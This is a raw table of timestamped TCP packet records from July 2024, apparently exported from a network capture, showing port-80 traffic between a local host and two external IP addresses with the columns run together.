                                                                              Jul 27, 2024 14:53:00.707693100 CEST8049750187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:00.707833052 CEST8049750187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:01.753737926 CEST8049750187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:01.753783941 CEST8049750187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:01.754048109 CEST4975080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:01.754410028 CEST4975080192.168.2.4187.199.183.102
                                                                              Jul 27, 2024 14:53:01.759768963 CEST8049750187.199.183.102192.168.2.4
                                                                              Jul 27, 2024 14:53:01.767362118 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:01.773008108 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:01.773236036 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:01.773401976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:01.779633045 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361272097 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361300945 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361316919 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361331940 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361346006 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361361980 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361376047 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361391068 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361406088 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.361588955 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.361879110 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.362157106 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.362157106 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.366940975 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.367538929 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.367587090 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.367624998 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.367789984 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.367790937 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.451144934 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451170921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451179028 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451185942 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451193094 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451200008 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451206923 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451215029 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451227903 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451234102 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451251030 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451529980 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.451558113 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.451735020 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.452212095 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452274084 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452308893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452325106 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.452343941 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452380896 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452390909 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.452919006 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452969074 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.452976942 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.453002930 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.453035116 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.453053951 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.453071117 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.453118086 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.453155994 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.453191042 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.453238964 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.541723967 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.541770935 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.541793108 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.541961908 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.541999102 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542015076 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542032003 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542062044 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542067051 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.542093992 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542110920 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542126894 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542144060 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542159081 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542177916 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542341948 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.542577028 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.542656898 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542706966 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542742014 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542761087 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.542774916 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542809963 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542824030 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.542843103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542881012 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.542895079 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.543144941 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543193102 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.543200016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543236017 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543282986 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.543356895 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543389082 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543421030 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543437004 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.543454885 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.543507099 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.544287920 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544338942 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544373989 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544388056 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.544408083 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544441938 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544464111 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.544475079 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544528961 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.544539928 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544867992 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544918060 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.544922113 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.544958115 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545003891 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.545079947 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545113087 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545147896 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545162916 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.545183897 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545232058 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.545816898 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545872927 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545906067 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.545927048 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.545984030 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.546015978 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.546035051 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.546051025 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.546097994 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.630353928 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630455971 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630489111 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630520105 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630553007 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630604982 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630637884 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630670071 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630702019 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630734921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630768061 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630765915 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.630765915 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.630800009 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630834103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630865097 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630913973 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630945921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.630979061 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631001949 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631002903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631002903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631002903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631002903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631002903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631015062 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631073952 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631081104 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631114960 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631162882 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631164074 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631198883 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631232977 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631258011 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631264925 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631299973 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631319046 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631331921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631364107 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631402016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631402969 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631437063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631475925 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631486893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631541967 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631573915 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631575108 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631608009 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631659985 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631711960 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631746054 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631772041 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631781101 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631831884 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631865978 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631899118 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631931067 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.631953001 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.631963968 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632030010 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632163048 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632196903 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632316113 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632376909 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632453918 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632518053 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632524014 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632607937 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632641077 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632663965 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632673979 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632709026 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632725954 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632838011 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632869959 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632886887 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632916927 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.632951021 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.632985115 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.718858004 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.718924046 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.718943119 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.718959093 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.718975067 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.718990088 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719007015 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719022036 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719038963 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719073057 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719127893 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719221115 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719253063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719302893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719335079 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719367981 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719388962 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719388962 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719388962 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719399929 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719433069 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719458103 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719465017 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719500065 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719522953 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719532967 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719564915 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719580889 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719595909 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719636917 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719646931 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719681978 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719713926 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719732046 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719748020 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719795942 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719854116 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719887018 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719918966 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719939947 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.719952106 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.719999075 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720159054 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720205069 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720236063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720256090 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720267057 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720299959 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720316887 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720331907 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720364094 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720381975 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720397949 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720447063 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720640898 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720673084 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720705986 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720721006 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.720738888 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720773935 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.720786095 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721117973 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721143007 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721158028 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721172094 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721179008 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721195936 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721210003 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721215963 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721246004 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721271038 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721287012 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721318007 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721388102 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721405029 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721419096 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721432924 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721443892 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721448898 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721465111 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721479893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721482992 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721494913 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721506119 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721513033 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.721525908 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.721563101 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722007036 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722023010 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722038031 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722075939 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722156048 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722172022 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722187042 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722201109 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722203016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722239017 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722477913 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722493887 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722508907 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722522974 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722523928 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722539902 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722553968 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722554922 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722573042 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722594976 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722595930 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722618103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.722625017 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722665071 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.722906113 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723124027 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723139048 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723154068 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723169088 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723172903 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.723185062 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723196983 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.723201036 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723217964 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723231077 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.723237991 CEST4975180192.168.2.464.190.113.113
